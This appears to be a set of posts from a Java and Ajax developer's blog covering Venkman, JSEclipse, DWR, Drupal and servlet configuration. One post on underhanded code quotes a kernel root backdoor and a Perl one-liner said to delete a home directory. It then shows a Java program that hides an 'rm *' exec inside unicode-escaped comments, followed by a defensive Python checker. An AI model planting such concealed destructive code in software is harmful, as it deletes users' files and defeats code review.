
Debugging Javascript under Firefox 1.5

Update: I've created a new permanent page for my Venkman patch:

Venkman for Firefox 1.5

Old blog content:

Currently you CAN! See below for update. Previously Venkman (the Javascript debugger) would not install, and if you tried to hack it by downloading the .xpi file, unpacking it, and altering the .rdf file to allow it to install, it crashed.

It appears that the issue is lack of interest from the developers in fighting for the attention of Mozilla central.

So I did a bit of digging and I think there is a patch for Venkman that might allow it to work. The patch is attached to this bug.

Has anyone made an installable Firefox plugin using this patch?

Slight side-track: While we are on the subject of Venkman, it is possible to alter the annoyingly huge fonts used in the source windows.

UPDATE: As JR Boyens noted, someone has made an XPI with the patches; however, it still had the version set to 1.1, so it still wouldn't install. So I had a hack, and while I was at it I reduced the size of the font in the source pane.

I am absolutely not about to start maintaining this thing. DWR is quite enough for me, but like me you might benefit from this quick hack.

You can download the xpi from here. This is a very simple hack so I promise nothing except that this will probably break, make your computer catch flames and then run off with your partner.

Writing malicious code in Java

The underhanded C contest is all about writing C code that looks innocent enough to get past a security review, but does something nasty on the side. It got me thinking about how to subvert things in Java.

Somewhat predictably the C contest was dominated by a small number of tricks:

  • Buffer overflow
  • Array bounds violation
  • Getting = and == the wrong way around

Java neatly sidesteps the first 2 by doing the checking for you. It’s kind of silly that we’re still fighting those 2 issues something like 30 years since they were first identified as being serious problems.

Java does a lot to shut down the =/== confusion by refusing to silently convert to a boolean. So Java programmers are a lot safer there too. Some code nearly got into the Linux kernel containing just such a back-door:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    retval = -EINVAL;

The net effect was to become root rather than check you are root. Oops.

Java's Strengths: High alpha to punctuation ratio

Some languages resemble line noise, and consequently can be very hard to understand. Perl would be the obvious culprit. I’m told that the following will delete your home directory:

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y;
 -/:-@[-`{-};`-{~" -;;s;;$_;see'

(I read it on Slashdot so it must be true. Of course I know you’re not going to test it out either so I could have just written rubbish above and no-one would know.)

Any language with a low alpha to punctuation ratio has plenty of scope for hiding malicious code in amongst innocent code. This is one of the reasons why generics has got a bad press – it lowers Java's alpha to punctuation ratio. It’s also the reason why I’m not too keen on regexs.

Java's Strengths: Security Manager

We perhaps ought to use this more than we do. I would guess that the vast majority of Java installations do not use the SecurityManager even in institutions that have high security requirements and don't particularly like trusting their programmers.

Java's Weaknesses

Java does have weaknesses, and the code below shows one of them.

I thought about using the trick of making immutable strings become mutable but decided there was a better way.

So here is my attempt at hiding malicious code using Java. It should be fairly obvious that the byte array contains "rm *" (which will delete all the files from the current directory on Unix) so that bit isn't well hidden. I guess I'd need to hide that bit away somewhere. The question is how did I subvert things so that the byte array at the bottom actually gets passed into the runtime.exec() at the top?

Since the code is Unix specific, on Windows I get the error message: "java.io.IOException: CreateProcess: rm * error=2":

DO NOT RUN THIS CODE UNLESS YOU REALLY WANT TO DELETE RANDOM FILES FROM YOUR COMPUTER. THE CODE BELOW IS MALICIOUS BUT IT IS DESIGNED TO LOOK INNOCENT.

import java.io.OutputStream;
import java.net.Socket;

public class Test {

  public static void main(String[] args) throws Exception {
    Test test = new Test();
    test.debug("hello");
  }

  public void debug(String msg) throws Exception {
    String s = "/usr/bin/logger ";
    Runtime r = Runtime.getRuntime();

    if (System.getProperty("os.name").equals("linux")) {
      /*
       * On linux we can make use of the  /usr/bin/logger command to keep
       * things simple.
       */
      r.exec(s + msg);
    }
    else {
      /*
       * Syslog code borrowed from log4j  by Ceki Gulc\u00FC
       * Network syslog calls must begin  with the following byte sequence:
       * \u002A\u002F \u0072 \u002E  \u0065\u0078\u0065c (\u0022 \u0072\u006D \u002A \u0022) \u003B \u002F\u002A<
       * followed by the message. For  more information see:
       *  http://cvs.apache.org/viewcvs.cgi/logging-log4j/src/java/org/apache/log4j/net/SyslogConstants.java?view=markup
       */
      Socket socket = new Socket("loghost", 514);
      OutputStream out = socket.getOutputStream();
      out.write(new byte[] { 0x2A, 0x2F, 0x72, 0x2E, 0x65, 0x78, 0x65, 0x22,  0x72, 0x6D, 0x22, 0x3B, 0x2F, 0x2A });
      out.write(msg.getBytes());
    }
  }
}

If you suss it out or if you have a clue, please comment.
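The listing above relies on javac translating \uXXXX escapes before it tokenizes the file (JLS §3.3), so an escape inside a comment can end that comment and the text after it is compiled as code. A review-time check for this, as an added example that is not part of the original post; the function names and the sample input are constructed for illustration, and the statement hidden in the sample is an inert placeholder:

```python
import re
# JLS 3.3: a backslash, one or more 'u', then exactly four hex digits.
ESC = re.compile(r"\\u+([0-9a-fA-F]{4})")

def translate(src):
    """javac's pre-pass: list of (char, physical_line, came_from_escape).
    Only a backslash preceded by an even number of backslashes starts an escape."""
    out, i, line, slashes = [], 0, 1, 0
    while i < len(src):
        m = ESC.match(src, i) if slashes % 2 == 0 else None
        c = chr(int(m.group(1), 16)) if m else src[i]
        out.append((c, line, bool(m)))
        slashes = slashes + 1 if (c == "\\" and not m) else 0
        line += (c == "\n" and not m)
        i = m.end() if m else i + 1
    return out

def suspicious_escapes(src):
    """Lines where an escape decodes into live code or opens/closes a comment or literal."""
    chars, state, hits, i = translate(src), "code", set(), 0
    while i < len(chars):
        c, line, esc = chars[i]
        nxt = chars[i + 1] if i + 1 < len(chars) else ("", line, False)
        pair, before, width = c + nxt[0], state, 1
        if state == "code":
            if pair in ("/*", "//"):
                state, width = ("block" if pair == "/*" else "line"), 2
            elif c in ('"', "'"):
                state = c                      # remember which quote opened the literal
        elif state == "block" and pair == "*/":
            state, width = "code", 2
        elif state == "line" and c in "\r\n":
            state = "code"
        elif state in ('"', "'") and c == "\\":
            width = 2                          # skip the escaped character in a literal
        elif c == state:                       # closing quote
            state = "code"
        touched = esc or (width == 2 and nxt[2])
        if touched and (before == "code" or state != before):
            hits.add(line)
        i += width
    return sorted(hits)

# Constructed sample: line 2 is a harmless escape, line 3 decodes to "*/ ... ; /*".
SAMPLE = r'''/*
 * Author: J\u00FCrgen
 * Header bytes: \u002A\u002F hidden(msg)\u003B \u002F\u002A
 */
send(msg);'''
print(suspicious_escapes(SAMPLE))
```

An escape that stays inside a comment, such as the accented letter in an author's name, is not reported; only escapes that change what the compiler treats as code are.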


The best Javascript editor so far

I'm always looking out for better Javascript editors, and I now have a new favorite: JSEclipse. Check this out:

JSEditor appears to have an ESP layer that I've not worked out yet. This ESP layer enables it to give you completions that ought not to be possible.

Scary

 

I have no idea how it can work out what the members of employee are since employee is an object that is dynamically generated by DWR, and the JavaScript file we are editing has no mention of even the path to the DWR server. (Maybe it's working it out by how employee is used? Either way it is fairly fancy)

Another example of it grokking Javascript much better than the Eclipse WTP Javascript editor is how it understands prototype.js. Sam doesn't hold back from exploiting Javascript features, and JSEclipse keeps up with him better than any other Javascript tool I've seen:

The outline right shows it correctly finding the things that prototype.js declares. The WTP editor makes a right mess of this.

Update: It appears to work based on usage - it remembers how an object is used and completes based on that.

 


Integration: How Open Source Beats Commercial Software

One major area where Open Source software leaves its commercial counterparts quite a long way behind is integration with other projects.

A great example is Hibernate vs TopLink. If you look at the list of other projects they integrate with (open or closed source) you see a long list for Hibernate, and virtually nothing for TopLink.

Hibernate talks to: XDoclet, Commons-Logging (and Log4j etc), OSCache, JBossCache, C3P0 and other caching libraries, JUnit and that's before I start listing databases. The list of projects that talk to Hibernate starts with Spring and goes on for a long time.

I can find very little on the TopLink website about projects that it integrates with. They do advertise a new feature - that the latest version of Spring talks to it.

The same story is true of DWR:

  • It can marshal XML from DOM, JDom, XOM and DOM4J
  • It logs through commons-logging to Log4j or JUL.
  • It does scripted injection via BSF to BeanShell, Groovy, or a hundred other scripting languages.
  • Through integration with Spring, you can get most places

And it seems that the story is the same all over open source land:

  • Spring integrates with: Hibernate, Struts, WebWork, JSF, DWR, iBatis, Tiles, Velocity and millions more
  • WebWork integrates with: JSTL, DWR, Velocity, XWork, ...
  • Groovy integrates with: Ant, SWT, JEdit, ...
  • JBoss integrates with: Tomcat, Hibernate, ...
  • Tomcat integrates with: Ant, BSF, ...
  • BSF integrates with: Xerces, Groovy, BeanShell, ...

It might be interesting to create a project map that shows projects and how they link to each other. My guess is that Spring, Ant and Commons-Logging would be in the middle.

This linking can be bad news. Sometimes you download a project only to find a twisted mesh of bizarre dependencies that just slows you down, but it can help too. If you are using Spring then, until the latest version, you'd be more likely to choose Hibernate over TopLink because of the Spring/Hibernate integration.

Why is the commercial world behind here?

Blogging can make you a better programmer

Michael Nielsen wrote an interesting piece about thinking and mentions something Stephen Covey did in a seminar:

"Covey has a large group of people in a room, split up into many small groups, each group seated around a small circular table. ... Covey tells people that he is going to make five points over the next ten minutes, and that after he’s done the person sitting at "6 O'Clock" at the table is going to explain the material to everybody else at the table.

"the first of Covey's five points is that the best way to learn is by teaching ... Then he looks around the audience, and asks people to compare the behaviour of the people sitting at 6 O'Clock to those not at 6 O'Clock. Invariably, the people at 6 O'Clock are assiduously taking notes, ... paying much closer attention on average than those not at 6 O'Clock.

"By changing the role of some of the people in that room ... Covey changed the way they perceived themselves, a change that was reflected in vastly more effective behaviour. They began to see themselves as teachers, and this made them much better learners."

It's interesting how something so simple can change your actions, but more interesting to me is how blogging is similar to sitting at 6 O'Clock.

Since I've been writing this blog I've noticed that I've started to take more notes. Originally because I've thought "that's cool I might want to refer to that". But I think the process of taking notes has made me remember more.

The other day I was considering the design of a fairly complex login system and normally I would just have considered what I needed to authenticate the users, but since taking a few notes on Web 2.0 (from articles like this one) which makes the point about how important data is to big web-sites I've altered my thinking about how the login system should work. If data and an on-going conversation with customers is important then you don't want to throw data away nearly so much as you did when you were only interested in authentication.

So the notes I made because I blogged have altered how I design software, and for the better. Which I guess is the point Covey was making in the first place.

Has blogging made you better at your job? You'll be answering in your blog using trackbacks of course ...


Re: Ajax Latency: Myth, Reality, and Solutions

Dion, Jep and Harry have all wondered about how to cope with multiple concurrent XMLHttpRequest calls, and asked what will break.

One of the DWR unit test configurations is to run all 200+ tests in parallel. I then load up IE/FF/Op all doing their 200 tests at the same time, at the same time.

I can say that the iframe implementation of Ajax on DWR creaks under IE, but XHR works just fine everywhere. That is to say the server correctly replies to all 600 vaguely concurrent requests without error. To be honest I'm even surprised that Windows can cope.

The lesson is - don't write your own Ajax code. Use a library like prototype or DWR.

You can run the tests yourself. Just download the war file, deploy, go to the /dwr URL, click on the unit tests link and play. Tell me if you manage to break it!

Mixing Rails or PHP with Java using DWR

DWR has taught me a neat trick when it comes to mixing Java with different languages. Any language will do; Ruby on Rails, PHP, I'm sure we could rustle up something with Forth or Whitespace.

The DWR website runs on Drupal (more on this in a bit) and Drupal is powered by PHP, but it still manages to run with DWR (for example, see the table demo). The trick is that DWR integrates simply at a Javascript/HTML level so, so long as your chosen front end language can produce Javascript and HTML, you're fine using it with DWR.

Part of the original thinking was to make DWR work properly with Struts, Webwork, etc, etc, etc without having yet another framework that takes over. We just discovered that working this way with SpringMVC and Wicket means we can also fit in with RoR and Zope too. All I know of Stripes is what I've read in Matt's blog but I'm sure DWR would fit in just fine there too.

Java and Drupal and Architecture

I think Java and PHP people are on different planets when they think about application architecture.

Drupal is supposed to work with Postgres, and I'm not keen on MySQL (the recent slashdot thread confirmed my feelings on this), so when we started to use Drupal it was on Postgres. But Drupal doesn't support Postgres like they say it does, so I got to digging around in the code a bit. And oooch.

I've seen Drupal people note that it is well architected, so I'd guess there is some logic to it, but I'll admit to not being able to see it. The PHP code is mixed in with SQL and HTML all in the same file. And the SQL seems to be MySQL specific, but there seems to be a processing stage to make it more Postgres compliant (it doesn't seem to work though).

If you tried this sort of thing in Java, you'd be laughed at. So why does this sort of thing go down well in PHP land?

Any ideas?

Ajax Eyelet Fastener

Someone has been busy pushing the boundaries of the web ...

I notice that they even tried to patent it (3rd from the bottom, RHS). However you'll be pleased to know that the patent has expired now.

Ajax Architecture

The popularity of Ajax and the trend towards richer user interfaces changes the way applications work, and that means we need to check that the software architecture we are using will still fit in a more Ajax world. Your combination of frameworks and libraries and jar files may be good for now, but what about tomorrow?


Idea for new Servlet spec

Some weeks ago Greg Murray wanted ideas for the next version of the servlet spec. I had an idea that would really help with working with many frameworks.

Originally J2EE was designed with componentization at a WAR and EJB-JAR file level. I think the idea was that you'd get a set of WAR and EJB-JAR files, bundle them up in an EAR and poof! Radical new web-app. I'm sure someone will correct me and tell me that wasn't the plan, but that's certainly the way it looks to me right now.

What has happened is that things have been componentized at a more granular level. For example Spring contributes an OpenSessionInViewFilter, DWR contributes an Ajax servlet, Struts, Webwork, etc contribute controller servlets. All of these come with instructions about a whole set of incantations to put into your WEB-INF/web.xml file.

So the solution is simple - We need a new element like this:

<include src="WEB-INF/lib/dwr.jar!ajax.xml"/>

This would allow web frameworks and libraries to export a set of web.xml insert files. And you could make use of some functionality with a single line.

It might be a good idea to have a <param...> mechanism to allow you to customize the action of the web.xml insert file.

Benefits

  • Less typing, and less cut and paste errors.
  • Clearer demarcation about what does what in your web.xml file.
  • Much simpler web.xml files, you only need to define what you have written, and just link to the stuff you are re-using.
  • The ability to have several different configs and switch between them without getting lost in comments. This is particularly good for altering security settings.

What do you think?
